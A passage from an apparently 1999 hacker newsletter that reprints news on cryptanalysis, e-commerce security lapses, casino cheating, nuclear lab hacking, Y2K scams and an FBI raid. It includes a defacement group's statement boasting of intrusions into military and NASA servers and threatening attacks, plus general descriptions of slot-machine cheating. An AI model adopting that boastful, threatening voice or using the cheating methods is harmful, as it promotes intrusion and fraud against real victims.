any conspiracy charge will put all of them in jail for a long time. At the time I spoke to Riggs, he was aware of only one time when some of these guys informed a suspected drug dealer (in Colorado, I believe) that there was a tap on his phone, apparently blowing some big DEA investigation. My source on all this was based on my email and phone conversations with Riggs, and putting two and two together after reading the online version of the story and recalling what Riggs said. @HWA 13.0 Israeli Sciemtist reports advance in codebreaking ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Israeli Scientist Reports Discovery of Advance in Code Breaking contributed by weld Shamir, the 'S' in RSA, has developed a new device that makes factoring the large numbers used in public key cryptograpy much easier. This makes those 512 bit PGP keys potentially vulnerable. You did pick 1024 bit didn't you? NY Times http://search.nytimes.com/books/search/bin/fastweb?getdoc+cyber-lib+cyber-lib+11455+0+wAAA+Shamir May 2, 1999 Israeli Scientist Reports Discovery of Advance in Code Breaking By JOHN MARKOFF An Israeli computer scientist is expected to shake up the world of cryptography this week when he introduces a design for a device that could quickly unscramble computer-generated codes that until now have been considered secure enough for financial and government communications. In a paper to be presented Tuesday in Prague, the computer scientist, Adi Shamir, one of the world's foremost cryptographers, will describe a machine, not yet built, that could vastly improve the ability of code breakers to decipher codes thought to be unbreakable in practical terms. They are used to protect everything from financial transactions on the Internet to account balances stored in so-called smart cards. Shamir's idea would combine existing technology into a special computer that could be built for a reasonable cost, said several experts who have seen the paper. It is scheduled to be presented at an annual meeting of the International Association for Cryptographic Research, which begins on Monday. The name of Mr. Shamir, a computer scientist at Weizmann Institute of Science in Rehovoth, Israel, is the "S" in R. S. A., the encryption design that has become the international standard for secure transmissions. He is a co-inventor of R.S.A. -- with Ronald Rivest of the Massachusetts Institute of Technology and Leonard Adleman of the University of Southern California. R.S.A. is known as public-key cryptography. In this system, a person has a public key and a private key. The public key is used to scramble a message and may be used by anyone, so it can, even should, be made public. But the private key that is needed to unscramble the message must be kept secret by the person who holds it. R.S.A., like many public-key systems, is based on the fact that it is immensely difficult and time-consuming for even the most powerful computers to factor large numbers. But Mr. Shamir's machine would make factoring numbers as long as about 150 digits much easier, thus making it much simpler to reveal messages scrambled with public-key encryption methods. A number of advances in factoring have been made in the last five years. But most of them are the result of applying brute force to the problem. When R.S.A. was created in 1977, Mr. Shamir and his colleagues challenged anyone to break the code. Employing 1970's technology, they said, a cryptographer would need 40 quadrillion years to factor a public key, and they predicted that even with anticipated advances in computer science and mathematics, no one would be able to break the code until well into the next century. In fact, a message the trio had encoded with a 129-digit key successfully withstood attack for only 17 years. It was factored by an international team of researchers in 1994. Using Mr. Shamir's machine, cracking the 140-digit number would be reduced to the difficulty of cracking a key about 80 digits long -- relatively easy by today's standards. Researchers said that if his machine worked it would mean that cryptographic systems with keys of 512 bits or less -- that is, keys less than about 150 digits long -- would be vulnerable in the future, an exposure that would have seemed unthinkable only five years ago. The longer 1,024-bit keys that are available today would not be vulnerable at present. 14.0 Ecommerce being hit hard by the shopping carts scandal? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Companies That Ignore Online Security Are Risking Customers contributed by weld The noise of all these online shopping cart security lapses has finally made the mainstream. Guess what? Some e-commerce sites have not hired anyone with security expertise to audit their sites. Some sites say since they use SSL that they are secure. They just don't get it do they. So the armored truck transferring the data is secure but what about the endpoints. NY Times http://www.nytimes.com/library/tech/99/05/cyber/commerce/03commerce.html By BOB TEDESCHI Companies That Ignore Online Security Are Risking Customers To placate those who worry about how secure it is to shop online, companies typically proffer the idea that buying on the Internet is no more risky than giving a credit card to a waiter in a restaurant. Given recent reports of E-commerce security lapses, that analogy may be giving waiters a bad name. Analysts and executives agree that a vast majority of E-commerce sites are secure, but some say the trend may actually be heading in the opposite direction. Many companies so fear being overtaken by a competitor who got to the Web first -- of "getting Amazoned," in the industry vernacular -- that they rush past security issues in their zeal to establish a Web site. Some companies lack the technical knowledge to use security safeguards; others say they cannot afford security products and advice. And there are those who simply do not consider it a priority. "I wish I had a dollar for every one of my clients that said, 'I don't care if the transaction is really secure; I just need my customers to think it is,'" said Larry Erlich, partner at Domainregistry.com, a Philadelphia company that registers Internet addresses and provides Web consulting services. In the case of one recently disclosed security problem, though, the issue seems to have been not a lack of concern by the Internet retailers but a limited technical knowledge. Two weeks ago, a Seattle Internet service provider, Blarg Online, reported that several software products that were used to create the "shopping cart" technology employed by some Web retailers could leave credit card numbers and other personal data exposed on a company's server, if the software was improperly installed. Those wishing to get at that information simply needed to type a few words and numbers into a search engine like Alta Vista, and they would have been able to get access to a compromised site's data files. The makers of the software say they have addressed the problem, but industry experts said problems involving other software and other Web sites could follow closely behind. One reason, said David Taylor, a vice president at the Gartner Group, a Stamford, Conn., research firm, is that many Internet companies have realized the value in collecting and selling customer data, "and in their quest for that data, people are being less than judicious about how they gather that information." Even the leading Internet companies are not immune to security problems. Earlier this month, for example, Yahoo acknowledged that customer data of one of its merchants had been exposed to the public. In that incident, customers of Vitanet, a retailer of nutritional products, had their addresses, order information and partial credit card numbers posted on a demonstration site that Yahoo had set up for study by would-be Web merchants. Only after being alerted to the security lapse several weeks later did Yahoo correct the problem, which it attributed to a software bug. Despite that stumble by Yahoo, many experts say that those most vulnerable to security flaws are small and medium-size sites. First, smaller operations often lack the money to hire security auditors -- which can cost $15,000 or more for a one-week sweep of a site -- and they generally lack the internal expertise to perform such audits themselves. Second, because they typically operate with a lean technical staff, such sites tend to rely on one software vendor for security needs. In fact, it requires more than one type of software to secure a site, security experts say. Still, some consultants say it is really not very expensive to provide at least a basic level of security. "If you're going ballistic with security, you could spend a lot of money," said Mamoon Yunus, a regional manager for i.Informix, the E-commerce division of the computer services company Informix. But otherwise, he said, "it needn't cost a lot." For instance, software designed to encrypt customer information as it travels to the seller, such as that sold by Verisign, costs $350 a year. And through companies like Cybercash, E-commerce sites can get credit card encryption and processing services set up for roughly $400, plus a fee of 20 to 25 cents a transaction. And for as little as $30 a month, smaller merchants can get secure online storefronts through companies like Cybercash and Internet providers. "Basically, there's no reason to have a security problem, except for a failure to do the homework," said Steven Kramer, president of the Picture Palace, an online retailer of rare and unusual movie videos. Those who run E-commerce sites say there is one additional issue deterring elaborate security systems: the customer's desire to move quickly through a transaction. For increased security, customers would have to go through multiple layers of registration and identity verification before buying, and many would bristle at the inconvenience, said Steven Rabin, chief technologist for Interworld, which develops sites for a number of large retailers. But Taylor, of Gartner Group, said that if reports of security breakdowns continued, E-commerce companies could be under increased pressure to regulate themselves if they do not want the Government to intervene. Taylor said more E-commerce sites should follow the lead of Gateway, the computer seller. In its privacy and security statement, Gateway asserts that "none of the tens of thousands of people who have made purchases through Gateway's Web site using SSL" -- secure sockets layer technology -- "have reported fraudulent use of their credit card as a result of their online order." When asked if, in the event of a security breakdown, Gateway would post information about it and the company's response, Chuck Geiger, Gateway's vice president for E-commerce, said: "It's a good idea, but I'd have to consult with our legal and public relations folks. But in terms of full disclosure and being honest, it makes sense." Taylor said that getting the entire industry to follow Gateway's example could be difficult, though. "The minute these companies start talking about security, they run the risk of bringing the party to a halt," he said. "But this is something the Government could impose, because it wouldn't be expensive for a merchant to do." The E-COMMERCE REPORT is published weekly, on Tuesdays. @HWA 15.0 Computer crime threatens the economy?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www,hackernews.com/ Computer Crime Threatens US Economy contributed by Simple Nomad So now all credit card crooks are hackers. Don't be hitting those URLs for the shopping cart transaction log files or you will be labled a super hacker. The one thing that the article has right is how inept local law enforcement is in catching crooks on the internet. The Dallas Police disbanded their computer crime squad because they couldn't get any qualified help. WFAA-TV News http://www.wfaa.com/news/9904/30/cyber_terrorism_2.html N E W S 8 I N V E S T I G A T E S Computer Crime Threatens U.S. Economy by Robert Riggs April 30 1999 DALLAS -- The FBI says a disturbing trend of hacker attacks and computer crime threaten our nation's economy. Specialized computers called web servers store information about customers who buy products over the Internet. If a web server is not secure, hackers can literally take all of the confidential information stored within, and anyone can become a victim. ONE VICTIM'S STORY Computer security expert David Dunagan never expected to become a victim of computer fraud. Then, a thief stole his identity and his credit card number and ordered a notebook computer over the Internet. Now Dunagan knows first hand just how easy it is. "You are one of millions of transactions a day to somebody, and they don't have time to see who you are, take your credit card, say, 'thank you.' It's just boom, boom, boom, get as many transactions as we can," he said. Dunagan recently came to News 8 Investigates after Dallas Police refused to look into his complaint. News 8 tracked the delivery address for the notebook computer to a North Dallas apartment complex. A woman who answered the door denied having every heard of David Dunagan. "Never heard of David Dunagan," she said. "No, I can't help you." Despite that denial, the apartment's manager said this resident asked that packages addressed to David Dunagan be delivered to her unit. It turns out that Dunagan's office assistant is her roommate. After searching the hard disk drive of the assistant's computer at work, Dunagan fired her. Dunagan was frustrated that police could not help him. "Their approach was, 'okay, well, we're too busy. We're too overloaded. We're too overworked right now to really deal with this, so thank you very much." CYBERCROOKS -- A STEP AHEAD Walt Manning investigated computer crime for the Dallas Police Department, but two years ago, the high tech crimefighting unit was disbanded. "You may or may not be able to find anybody that can help you -- not because they're not willing, just because they don't know how," Manning explained. Manning also said these cybercrooks may be way ahead of law enforcement agencies. "We are starting to see terrorists recruit hackers," he said. "I have read reports that show there are drug cartels in the world that now have professional hackers on their payroll, and have the capability to wage information warfare against the United States." In fact, at the start of the air war against Yugoslavia, Serbian hackers bombarded NATO's website. They overloaded its computer with electronic mail "bombs" until it crashed. No one is safe. Hackers also defaced the Justice Department web page with Nazi swastikas and pornography. They even hit the CIA, renaming the spy agency the "Central Stupidity Agency." CRIME OF THE MILLENNIUM?" Matt Yarborough, the federal computer crimes prosecutor for North Texas, said this is the crime of the millennium. "Think about it," he said. "More and more traditional modes of communication are going on line to the Web." Yarborough warns that hackers can steal confidential information about customers from unsecured websites, and businesses can lose millions of dollars in sales if hackers shut down those websites. "We are adding hundreds, thousands, millions of people per year to the Internet," Yarborough said, "and remember -- anybody can be a hacker. Any individual sitting at their keyboard can choose to hack." HACKERS SHARE INFO ON THE INTERNET How do they do it? Hundreds of hacker sites on the Internet make cyber burglary tools widely available. Some feature an international menu of programs to attack systems. They offer how-to manuals for beginners. One software program cracks the mathematical formula used by credit card companies, generating valid numbers that often pass security checks. There are many more highly sophisticated programs useful for stealing information. FBI Agent Mike Morris demonstrated how a picture of a starburst can conceal a written document. With just a click, he revealed the hidden message. He explained that this technique could be useful for terrorists or military spies or even industrial espionage. "It could be the company's most valuable trade secret.," Morris said. "'Here mom, here's a picture of Johnny riding his bicycle.' Inside, there is a secret formula for whatever you are working on." It's against the law to even try to break into a computer system, but hacker tools are legal to own until you use them. In response, the FBI and U.S. Attorney urge companies to form neighborhood watches for computer fraud -- and not to sweep break-ins under the carpet. PROTECTING YOURSELF Here are some tips to protect yourself when making purchases over the Internet: Be suspicious of anyone who uses an anonymous e-mail address and doesn't give their name, address, and telephone number. Never send your credit card number by e-mail. Be wary of sending checks or money orders. If you are going to do business on the Internet, there are a lot of questions you should be asking about how your information is protected. @HWA 16.0 Cracking the casinos, a Defcon primer? *g* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Silicon Crackers Tackle Casinos by Vince Beiser 3:00 a.m. 3.May.99.PDT First of two parts LAS VEGAS -- Dennis Nikrasch has been tried, convicted, and sentenced to seven-and-a-half years in Nevada state prison. Still, no one really knows how he stole that US$6 million. What is generally agreed on, though, is that Nikrasch, 57, is one of the greatest slot-machine cheats in history -- and the most technologically adept. "Nikrasch," said Keith Copher, chief of enforcement for Nevada's Gaming Control Board, "is the most sophisticated cheat we've seen." Nikrasch started out in the 1970s, rigging mechanical-reel slots. His skills, however, have kept pace with the times. Last fall, a months-long FBI investigation nailed him and several confederates for scamming millions in cars and cash by cracking the silicon chips that control today's computer-based slot machines. Nikrasch is only one of a growing number of hustlers using advanced technology to rip off casinos. In belated response, the gambling industry is just beginning to deploy state-of-the-art security technology. The stakes of this technological race are mounting rapidly, as the multibillion-dollar gambling industry spreads across the country. Slot cheating alone is estimated to cost casinos some $40 million a year. The equipment is easy to come by. You can buy an astonishing array of devices to help you cheat at slots or cards at the Hackers Home Page, for instance. Counting cards is not illegal; using a device to help you do it, however, is a felony. That hasn't deterred a generation of grifters from putting the ultimate counting devices -- computers -- to work for them. Andy Andersen, a veteran Las Vegas private investigator, keeps a scrapbook of all the scams he's seen. On Page 1 is a Polaroid of a man with a lunchbox-sized computer on his hip, wired clumsily to a bandoleer of batteries around his chest. The year was 1978; it was the first wearable card-counting computer Andersen had seen. "Cheats have been using technology since long before the casinos ever thought they were," said Andersen. The clunky hip-computer soon gave way to the "toe-tapper," a computer small enough to be hidden in a player's boot. A player uses his toes to record which cards are dealt, and the computer emits tiny electric shocks to indicate when to hit or stand. Toe-tappers are still used, but the latest card scam turned up last fall in Atlantic City. Casino security staff discovered that a man playing high-stakes mini-baccarat had a subminiature video camera disguised as a button on his coat sleeve, which he positioned to monitor the cards as they slid out of the mechanical shuffling machine. His partner was watching the video from a van in the parking lot, then radioing back, via a tiny receiver in the player's ear, which cards were coming up. For fast money, nothing beats the slot machines. Some older machines can still be successfully jacked with equipment as primitive as a dollar on a piece of duct tape that can be yanked back after triggering a credit, or a tiny light bulb on a wire that blinds the machines' optic counter so that it keeps spitting out coins. "There are lots of little ways to cheat," said Frank Luizzo, a former Nevada state trooper who used to infiltrate cheating gangs. "But the guys who use electronics are going after the cars, the boats, the millions of dollars. That's balls, big balls." Take Barry Zeltner. Last year, Zeltner figured out a way to run a static electric shock through video keno machines in several Nevada casinos, forcing them to reset. Zeltner would then play a series of numbers he knew were more likely to come up after a resetting. He scammed an estimated $750,000, got caught, jumped bail, and is currently on the run. Nikrasch, however, is believed to have pulled in about $10 million in the late 1970s, a run that earned him five years in prison. He was only out for a few years before he began his chip-hacking scam. No one has figured out exactly how he beat the chips, and Nikrasch isn't saying. "I have no desire to explain anything to the public," he wrote Wired News from jail. "Never smarten up a chump." Court documents and interviews with law-enforcement officials, however, reveal most of the story. Nikrasch apparently bought a slot machine to practice on at home and obtained extra computer chips from the machine's manufacturer. He probably got the keys required to open the casinos' machines on the black market, where casino employees can sell copies for thousands of dollars. In the casinos, his partners would crowd around to block the surveillance camera's view while Nikrasch opened the machine and the housing around the computer chip. He would then attach clips to either side of the chip, use a handheld device to force-feed it the jackpot code, and close the works back up -- all in under a minute. One of Nikrasch's partners would then sit down to "play." The next coin, of course, would trigger the jackpot. There's no way of knowing how many other technology-driven scams are going on or how much they cost the gambling industry. Unlike other businesses, there's no lost inventory to count. "You don't know you're being cheated," said Copher, "until you catch someone." Copher should know. Just last year, Gaming Control arrested a man for rigging the computer programs in several slots to scam $50,000. The cheat turned out to be one of his own agents. PART II Casinos Fight Back with Tech Vince Beiser 3:00 a.m. 4.May.99.PDT Second of two parts. LAS VEGAS -- The surveillance cameras pick up Andy Andersen the instant he steps into the vast casino at Caesars Palace. He strolls through banks of slot machines and over to the blackjack tables to chat with a pit boss he knows. By that time, a security agent is on the phone to the pit, demanding to know why Andersen's there. There can be only one reason: trouble. Andersen is famous in Las Vegas security circles as a top-notch private investigator, a pioneer who uses cutting-edge technology to catch card counters, slot scammers, and all manner of casino cheats. He is best known for his remote-monitoring system. Using a laptop and a cell phone-modem, Andersen can link into a client casino's surveillance system from anywhere, check a suspected grifter's face against his private database, and tell surveillance whether to evict him. Tonight, however, Andersen, his white hair gelled back and a pair of tiny gold handcuffs on a chain around his neck, is just checking on the progress of a new system he plans to take online in 1999. It will move casino surveillance technology to a new level: a digital casino network that incorporates biometric facial recognition technology. "We've got to get into high technology," said Andersen, "because the cheaters have." Most casino security systems are surprisingly behind the technological times, thanks to the complacency of their old-school owners and the vast profits they rake in despite the cheaters. But as the gambling companies grow ever larger and more sophisticated, the casinos are beginning to realize how tech-savvy cheaters are ripping them off. And they're moving to catch up. "The technology we have now is ancient," said Frank Luizzo, a former Nevada state trooper who now oversees security for Las Vegas' Hard Rock Hotel & Casino. "The industry didn't realize how much it was losing, so it didn't want to invest more in security. But that's changing now." The surveillance room of the Tropicana, a Strip landmark, is typical: In a windowless room suffused with a deep cathode glow and the low thrumming of machinery, two officers sit hunched over keypads, scanning a wall of 52 mostly low-resolution, black-and-white monitors. When someone on the casino floor catches the watchers' interest, they use a joystick to zoom in, rotating or tilting the cameras as needed. Meanwhile, the images on the other monitors change every few seconds, cycling through the views from each of hundreds of ceiling-mounted cameras. Against a wall, 220 VCRs ceaselessly record everything the cameras see. It's a clunky system. The tapes have to be reviewed manually, are a nuisance to archive, and leave many casinos periodically "blind" for a few seconds while fresh cassettes are put in. More-flexible digital systems are only just hitting the market. California-based Sensormatic's Intellex system is one of the most sophisticated. A Pentium-equipped PC controls up to 16 digital cameras, all feeding into a single monitor via an ISDN line. Everything is archived to DAT tape, which can then be searched with "motion filters." Users highlight, say, a stack of chips with a mouse, and the computer searches through hours of tape in seconds to find every instance where those chips moved. Casino floor managers, or detectives like Andersen, can also tap into the system at any time from their laptops. The trouble, said Sensormatic spokesman Alex Durazo, is that "it's not real time, just 15 to 20 frames per second. That means you could miss split-second movements." Real-time digital recording is still prohibitively expensive, considering that most casinos have upwards of several hundred cameras recording nonstop. Digital recordings are also inadmissible in court because of concerns over the ease with which they can be altered. The industry's prevailing mindset, however, also slows the acceptance of new technologies. Ask Oliver Schubert, president of Casino Software & Services, which developed a voice-controlled program that analyzes blackjack players to determine whether they are counting cards. "When we started seven years ago, we had to supply the computers along with the software system because most casinos didn't have them," said Schubert. "There are a lot of old-timers in this business who just want to do things the way they always have." Among the antiquated weapons in the Strip's defensive arsenal is a fax network linking a dozen or so casinos. Today, when surveillance at one casino spots a cheater, it faxes a picture of the miscreant to everyone else in the network. "Half the time, it just comes out a black square," said Keith Michaels, the Tropicana's director of surveillance. That network is exactly what Andersen's company, CVI, is out to replace. Starting sometime in mid-May, CVI's network will connect at least 15 casinos around the country, enabling them to digitally transmit scanned images of cheaters to each other. Andersen can also provide remote assistance with his laptop surveillance system. But his job, too, will become partly automated. Using technology marketed by CVI partner Biometrica Systems, the system will also allow surveillance agents to capture a live image of a suspicious player's face, then run it against a digitized photo database of known cheaters for instant identification. The system has already been installed in three major casinos. "As gambling spreads, there are more cheats to watch in more casinos," said Andersen. And more ways than ever to watch them. @HWA 17.0 Crackers gearing up to attack U.S nuke labs? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://cnn.com/US/9905/03/us.china.spy/ Report warned of cyber attacks on nuclear labs May 3, 1999 Web posted at: 1:01 a.m. EDT (0501 GMT) WASHINGTON (CNN) -- A classified report from U.S. intelligence agencies warned the Clinton administration in November that computer systems at national nuclear weapons labs were vulnerable to cyber attacks, a senior administration official told CNN on Sunday. Yet a Taiwan-born researcher, suspected of downloading sensitive files while working at the Los Alamos National Laboratory in New Mexico, was able to keep high-level security clearance until his firing in March. Wen Ho Lee reportedly took information from a secure computer database at the laboratory and transferred it to a less secure system, which would have been accessible from outside the lab. The agencies conducted the threat assessment as a result of a directive issued in February 1998 by President Clinton, after allegations that China obtained U.S. nuclear secrets by penetrating the Los Alamos National Laboratory. A senior U.S. lawmaker predicted Sunday that there would be more "revelations" concerning suspected nuclear espionage by China. "The damage was bad, a lot worse than people ever imagined," said Sen. Richard Shelby (R-Alabama). "I'm afraid they have a lot more than we ever dreamed," said Shelby, chairman of the Senate Intelligence Committee, on "Fox News Sunday." The November report documents more than 200 attempts to infiltrate non-secure computer systems at the nuclear laboratories. But nuclear laboratories are not the only vulnerable government facilities. A number of federal agencies, including the Department of Defense, are routinely attacked by hackers. The threat assessment warned that China, Russia and India could seek U.S. nuclear secrets. A number of government investigations warned various administrations dating back to President Bush about lax security at the labs. One recent General Accounting Office report raised concerns about a U.S. overseas visitor program that allowed hundreds of visits without background checks. Last October, Energy Secretary Bill Richardson initiated a number of measures to improve security at the nuclear labs. In mid-March of this year, he launched a program to improve cyber security. Later in the month, Richardson learned of the cyber spying allegations against Lee. According to Richardson, the information in question related to simulated testing for nuclear weapons and nuclear weapons design. The FBI, which had been investigating Lee since 1996, had attempted without success to have the Justice Department approve a court-authorized wire tap or search warrant. Justice officials had questioned whether there was enough evidence to pursue a wire tap or search warrant. Richardson said he shut down computer work at the labs for two weeks beginning April 2 of this year. Lee agreed to allow the FBI and Energy Department to check his computer files. He has denied any wrongdoing and has not been charged with any crime. He was fired in March from his Los Alamos post for allegedly failing to inform Energy officials about contacts with China, and allegedly failing to safeguard classified materials. Shelby said his committee would soon focus on how the Justice Department and the FBI dealt with Lee, who reportedly came to the attention of investigators in 1994. "There is a lot of blame to go around, and I think it's serious," Shelby said. Lawmakers including Shelby have questioned why so many warnings seemed to go unheeded, and why it took so long to zero in on Lee's alleged activities. "It looks to me like this is a botched investigation by the FBI, and I think there is some culpability with the Justice Department," Shelby said. "I think the Justice Department treated this as an ordinary case when it should have been an extraordinary case." Justice officials were not available for response. Justice Correspondent Pierre Thomas and Reuters contributed to this report. @HWA 18.0 Calling all |<rad hax0rZ! ~~~~~~~~~~~~~~~~~~~~~~~~~ From ProjectGamma http://www.projectgamma.com/ Calling all /<-RaD hax0rZ May 3, 1999, 23:26 Author: WHiTe VaMPiRe Yes, you have waiting long and hard, that time spent will finally be paid off! Hackers Associated Online (HaO) is now accepting members!@!$ Pull out that dust covered winnuke, your copy of AOHell and UpYours; they will finally be put to use. Yes, you read correctly, HaO is accepted members. You will finally be just as er33rt and f33red as the true elites, move over I-L and #feed-the-goats, it is HaO; they take no prisoners! HaO was founded to "to create a safe arena for information exchange"; only if you join and get access to their members' section, that is. Quick! Send in your application now, because "Not everyone that applies will be excepted into the organization." But beware, they have hard questions and high requirements if you wish to be a member of this motley crew. You have to answer such brain boggling questions, such as, "What is a BIOS?", "Who wrote the 'Hacker's Manifesto'?", and "What command do you type to get a directory listing in Linux?" (I think they mean "folder".). Be a hax0r, be a man, and be part of HaO. Related links: HaO - You know you want it http://www.hao.org/ @HWA 19.0 Millenium Bug Insurance hoax ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://net-security.org/ EARN MONEY WITH Y2K PROBLEM by BHZ, Wednesday 6th May 1999 on 9:12 pm CET "Since April 1, the Australian Securities and Investments Commission -- the Antipodean version of the Securities and Exchange Commission -- has been running a massive Internet investment hoax site, inviting gullible surfers to commit to $10,000 and $50,000 investment packages and reap a threefold return on their money". So someone started to make money from poor people. Read whole article on ZDNN. http://www.zdnet.com/zdnn/stories/news/0,4586,2252308,00.html @HWA 20.0 Y2K Viruses ~~~~~~~~~~~ From http://net-security.org/ by BHZ, Tuesday 4th May 1999 on 10:12 pm CET Sunday Times did an article on possible year 2000 viruses. "The latest trick for virus writers is to gain access to an e-mail user's address book to get names and addresses to send rogue programs so that the recipients believe they have received something from a trusted friend". That was famous routine of Melissa virus. According to them E-mail containing year 2000 greetings cards and fabulous millennium offers are expected to spread viruses. Lol, who will open .exe file saying that it is a e-mailed postcard? Ppl beware. Now days you must have a antivirus program (Sophos or McAfee will do) . @HWA 21.0 Two virii more powerful than CIH kept hidden ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://net-security.org/ 2 OTHER VIRIIS HIDDEN by BHZ, Monday 3rd May 1999 on 9:18 pm CET Chen Ing-hou, famed CIH creator said that he has almost finished designing two more powerful versions. He told the press that one of the new viruses would be able to penetrate servers of Microsoft's NT Windows and paralyse them. Police said that they will search his home in order to destroy viruses. @HWA 22.0 Microsoft keeps lid on Y2K fix for windows95 users ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://net-security.org/ YK2 FIX WAS KEPT AWAY FROM WINDOWS USERS by deepcase, Monday 3rd May 1999 on 7:52 pm CET For almost a year, Microsoft Corp. withheld from its 125 million corporate users of Windows 95 the information that a software patch was in the works to make the desktop operating system fully year 2000-compliant, a Microsoft official confirmed last week. More about this on CNN. From ComputerWorld; Windows 95 Y2K fix was kept from users May 3, 1999 Web posted at: 11:28 a.m. EDT (1528 GMT) by Julia King (IDG) -- For almost a year, Microsoft Corp. withheld from its 125 million corporate users of Windows 95 the information that a software patch was in the works to make the desktop operating system fully year 2000-compliant, a Microsoft official confirmed last week. "I don't want people taking action based on Microsoft thinking about doing something," said Don Jones, year 2000 product manager at Microsoft. "Until I'm 100% sure that we're going to provide an update or fix, I don't want to tell anybody," Jones added. "People will spend millions of dollars, [implementing strategies based on such information], and the last thing I want to do is spread fear, uncertainty and doubt in their minds." One company now gearing up to spend millions on an upgrade from Windows 95 to 98 -- based at least partly on year 2000 concerns -- is Electronic Data Systems Corp. Until mid-March, EDS officials believed -- like all Windows 95 users -- that Microsoft wouldn't make Windows 95 fully year 2000-compliant. At best, they were told, Windows 95 would be "compliant, with minor issues." Jones' comments are the latest in a series of clarifications, memos and statements to emerge from Microsoft since March 29, when Computerworld ran a front-page story about EDS's about-face plan to migrate 100,000-plus desktops from Windows 95 to 98. Previously, EDS planned to stick with Windows 95, but it changed course on Microsoft's advice to the company, according to an internal memo by former CIO Gary Rudin, who abruptly resigned from EDS on March 31. Microsoft denies But then and now, Microsoft officials insist they never advised EDS or any other corporate customer to remain on Windows 95 or to upgrade to Windows 98 for year 2000- readiness reasons. So why would the CIO of EDS send out a memo saying as much? "You'll have to ask Gary [Rudin]," Jones said. "It's certainly not our policy. We do recommend that people go to the latest versions of our operating system, but not for year 2000 reasons." Rudin didn't return telephone calls last week. Also, following the March 29 story about EDS, Microsoft issued an internal market bulletin to its sales staff to eliminate what it described as "confusion" generated by the Computerworld story. Among other things, the bulletin told salespeople that "the Computerworld article is very misleading," and despite the article's suggestions, "Microsoft's position on Windows 95 Year 2000 compliance has not changed." Yet under a section titled "Facts Regarding... Year 2000 Compliance," the company tells its salespeople that "Microsoft is providing a software update for Windows 95 to resolve the outstanding minor issues." When questioned by Computerworld reporters, Microsoft officials couldn't specify any incorrect or misleading information in the March 29 story. @HWA 23.0 Iron Lungs and DK get raided by the FBI ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Iron Lungs Raided by the FBI contributed by Anonymous Iron Lungs and dk were raided by FBI officials early Tuesday morning. The FBI confiscated all of the suspects computer systems (possibly including their web server -www.legion2000.org). The two people were in several organizations such as HcV, Forpaxe, l2x, and #feed-the-goats. They were taken into custody and later released for allegedly breaking into 45 military servers, 17 nasa.gov servers and various gov.uk, gov.se, gov.au servers. HNN has received email that this was reported in the Bristol Herald Courier and possibly even the Myrtle Beach Times. We have not yet been provided with a URL to verify this story. HNN has spoken with Iron Lungs via IRC who has verified this story. It is still uncomfirmed as to 'dk' involvement. @HWA 23.1 Statement from F0rpaxe (associated with IL) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ F0rpaxe Speaks Out contributed by Esoterica Yesterday HNN reported that the FBI had raided Iron Lungs (IL) and possibly dk and had taken them into custody for questioning. One of the groups that IL has been affiliated with is F0rpaxe. This Portuguese group has claimed responsibility for defacing numerous military and government web servers. HNN has received an exclusive statement from F0rpaxe that details what they are about and what they aim to do. F0rpaxe Speaks Out From HNN Ed Note: HNN was asked to edit this statement and correct for grammar and spelling. We decided it was best to present the words exactly as they where received so as to not confuse their meaning. F0rpaxe People from all over are now realizing what F0rpaxe is capable. The name is spreading on like fire. F0rpaxe is a Portuguese group which had been working on the shadow for some years. All this is now changing. Along time Portuguese Institutions tried to kept us hiden.. WE had been opressed... Our freedom was taken way. Our servers were shutdown by Portuguese Enteties and our public connection to the cyberworld was deleted... F0rpaxe decides to fight against all this injustice. We breaked in some Portuguese servers in wich Portuguese Airforce, Portuguese gov servers etc.. Soon we realize that security in Portugal was even worst than we thought. WE start hacking more important servers like US military servers and gov servers and mostly NASA servers. Along time F0rpaxe had been connected to HCV since m1crochip and I-L were friends. When I-L started to knew about all the hacks we were performing he asked to enter to the group. He wanted to help us.Soon we started our mission.. Our main goal is to show the Portuguese government that they can�t manipulate us. Besides this we don�t have motives.... and for what matters to NASA they can launch their systems to MARS because on earth they are vulnerable like everyone. FBI can burn in Hell if he wants too. We will continue with our current missions either if FBI likes it or not. Recently F0rpaxe had been the responsable group for breaking into important military servers, gov servers and Nasa servers among other who hadn�t been reported or that are still being explored.. Military Databases and other confidencial info had been copyed. We have info and knowledge to get down a major military network in seconds so if FBI wants to get burned he can sit down and wait and we will show them.. Recently I-L had been acussed for the breakin of several Servers. I as founder of Forpaxe declare that the recent hacks had been only executed by F0rpaxe. THis makes us both responsable. I-L as member of F0rpaxe is involved but not tottaly. As leader of F0rpaxe i�m the main responsable. I�m telling you this because FBI can�t get their hands on us and also I-L is being targeted of injustice. Don�t accuse a man who is trying to help us out. WE (m1crochip / I-L) are a team. Forpaxe Technologies Inc. m1crochip @HWA 24.0 SIPRNET to be made more secure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SIPRNET to Made Even More Secure From HNN http://www.hackernews.com/ contributed by l3inad In an effort to increase security on the DODs Secret Internet Protocol Routing Network, (SIPRNET) information access will be restricted. While SIPRNET allegedly has no direct connection to the internet DOD would like to further protect its classified information network from internal security threats. It hopes that by compartmentalizing access to information and only allowing access to information required to preform a job function that the network can be made more secure. (It is interesting that information like this gets out to the general public. It is surprising that DOD publicly explains its defense posture for its most secure systems.) Federal Computer Week http://www.fcw.com:80/pubs/fcw/1999/0503/web-pki-5-5-99.html MAY 5, 1999 . . . 16:25 EDT DOD taking steps to secure secret network further BY DANIEL VERTON (dan_verton@fcw.com) SALT LAKE CITY -- Looking to protect its classified information network from internal security threats, the Defense Department is considering a new policy that will limit strictly network users' access to information. DOD uses the Secret Internet Protocol Routing Network, or SIPRNET, as a secure intranet for sharing information classified as secret. Though 